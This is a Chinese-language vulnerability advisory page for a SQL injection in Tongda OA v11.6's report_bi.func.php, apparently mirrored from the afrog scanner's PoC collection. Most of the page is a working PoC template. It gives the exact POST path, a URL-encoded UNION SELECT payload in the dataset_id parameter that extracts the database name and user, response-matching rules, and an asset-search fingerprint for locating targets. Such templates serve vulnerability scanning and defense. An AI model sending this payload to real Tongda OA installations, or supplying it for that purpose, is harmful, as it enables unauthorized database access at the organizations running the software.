tongda-report-bi-func-sql-inject: 通达OA v11.6 report_bi.func.php SQL注入漏洞

日期: 2025-09-01 | 影响软件: 通达OA | POC: 已公开

漏洞描述

通达OA v11.6 report_bi.func.php 存在SQL注入漏洞,攻击者通过漏洞可以获取数据库信息 app="TDXK-通达OA"

PoC代码[已公开]

id: tongda-report-bi-func-sql-inject

info:
  name: 通达OA v11.6 report_bi.func.php SQL注入漏洞
  author: zan8in
  severity: critical
  verified: true
  description: |
    通达OA v11.6 report_bi.func.php 存在SQL注入漏洞,攻击者通过漏洞可以获取数据库信息
    app="TDXK-通达OA"
  reference:
    - http://wiki.peiqi.tech/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.6%20report_bi.func.php%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html

rules:
  r0:
    request:
      method: POST
      path: /general/bi_design/appcenter/report_bi.func.php
      body: |
        _POST[dataset_id]=efgh%27-%40%60%27%60%29union+select+database%28%29%2C2%2Cuser%28%29%23%27&action=get_link_info&
    expression: response.status == 200  && response.body.bcontains(b'"col":') && response.body.bcontains(b'"td_oa"') && response.body.bcontains(b'"target":') && response.body.bcontains(b'"para":')
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/tongda-report-bi-func-sql-inject.yaml

相关漏洞推荐